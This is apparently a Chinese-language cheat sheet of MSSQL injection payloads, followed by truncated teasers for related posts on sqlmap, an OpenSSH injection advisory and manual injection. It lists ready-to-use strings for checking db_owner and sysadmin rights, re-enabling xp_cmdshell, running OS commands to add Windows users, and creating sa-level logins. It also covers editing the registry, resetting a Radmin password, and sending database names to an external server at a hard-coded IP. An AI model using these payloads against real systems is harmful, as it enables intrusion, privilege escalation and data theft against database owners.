//看看是什麼許可權的
and 1=(select is_member('db_owner'))
and char(124)%2bcast(is_member('db_owner') as varchar(1))%2bchar(124)=1 ;--
//檢測是否有讀取某資料庫的許可權
and 1= (select has_dbaccess('master'))
and char(124)%2bcast(has_dbaccess('master') as varchar(1))%2bchar(124)=1 --
數字型別
and char(124)%2buser%2bchar(124)=0
字元型別
' and char(124)%2buser%2bchar(124)=0 and ''='
搜尋型別
' and char(124)%2buser%2bchar(124)=0 and '%'='
爆使用者名稱
and user>0
' and user>0 and ''='
檢測是否為sa許可權
and 1=(select is_srvrolemember('sysadmin'));--
and char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1 --
檢測是不是mssql資料庫
and exists (select * from sysobjects);--
檢測是否支援多行
;declare @d int;--
恢復 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// 執行命令
//-----------------------
首先開啟沙盤模式:
exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1
然後利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
執行命令
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c:/winnt/system32/cmd.exe /c net user paf pafpaf /add';--
exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:/1111'
判斷xp_cmdshell擴充套件儲存過程是否存在:
寫登錄檔
exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1
reg_sz
讀登錄檔
exec master..xp_regread 'hkey_local_machine','software/microsoft/windows nt/currentversion/winlogon','userinit'
讀取目錄內容
exec master..xp_dirtree 'c:/winnt/system32/',1,1
資料庫備份
backup database pubs to disk = 'c:/123.bak'
//爆出長度
and (select char(124)%2bcast(count(1) as varchar(8000))%2bchar(124) from d99_tmp)=0 ;--
更改sa口令方法:用sql綜合利用工具連線後,執行命令:
exec sp_password null,'新密碼','sa'
新增和刪除乙個sa許可權的使用者test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
刪除擴充套件儲存過過程xp_cmdshell的語句:
exec sp_dropextendedproc 'xp_cmdshell'
新增擴充套件儲存過過程
exec [master]..sp_addextendedproc 'xp_proxiedadata', 'c:/winnt/system32/sqllog.dll'
grant exec on xp_proxiedadata to public
停掉或啟用某個服務。
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
只列某個目錄下的子目錄。
xp_getfiledetails 'c:/inetpub/wwwroot/sqlinject/login.asp'
dbo.xp_makecab
將目標多個檔案壓縮到某個目標檔案之內。
所有要壓縮的檔案都可以接在引數列的最後方,以逗號隔開。
dbo.xp_makecab
'c:/test.cab','mszip',1,
'c:/inetpub/wwwroot/sqlinject/login.asp',
'c:/inetpub/wwwroot/sqlinject/securelogin.asp'
xp_terminate_process
停掉某個執行中的程式,但賦予的引數是 process id。
利用」任務管理器」,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程式的 process id
xp_terminate_process 2484
xp_unpackcab
解開壓縮檔。
xp_unpackcab 'c:/test.cab','c:/temp',1
某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 匯入註冊檔案,但是mssql是sa許可權,使用如下命令 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','parameter','reg_binary',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改埠值 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','port','reg_binary',0xd20400 則埠值改為1234
create database lcx;
create table ku(name nvarchar(256) null);
create table biao(id int null,name nvarchar(256) null);
//得到資料庫名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
//在master中建立表,看看許可權怎樣
create table master..d_test(id nvarchar(4000) null,data nvarchar(4000) null);--
用 sp_makewebtask直接在web目錄裡寫入一句話馬:
//更新表內容
update films set kind = 'dramatic' where id = 123
//刪除內容
delete from table_name where stockid = 3
sqlmap的注入使用常用命令
sqlmap的注入使用 sqlmap是一款強大的注入工具,相比經典的啊d和明小子之類的注入工具,sqlmap功能更加強大,無論是自帶字典,功能還是介面優化,都是一款非常不錯的注入工具,sqlmap可以多平台 執行,windows,linux下都可以進行access,mysql,mssql等資料庫的注...
命令注入 漏洞修復 OpenSSH 命令注入漏洞
cnnvd編號 cnnvd 202007 1519 危害等級 高危 cve編號 cve 2020 15778 漏洞型別 作業系統命令注入 威脅型別 本地 漏洞簡介 openssh openbsd secure shell 是openbsd計畫組的一套用於安全訪問遠端計算機的連線工具。該工具是ssh協...
SQL注入手工注入常用的語句
判斷是否存在注入 and 1 1 and 1 2 回顯頁面不同 整形判斷 輸入and 1 1和and 1 2後發現頁面沒有變化,判斷不是整型注入 輸入 and 1 1 23和 and 1 2 23後發現頁面變化,判斷為字元注入 在資料庫中 1 1 和1 2 後面隨便輸入字串 相當於1 1和1 2後面...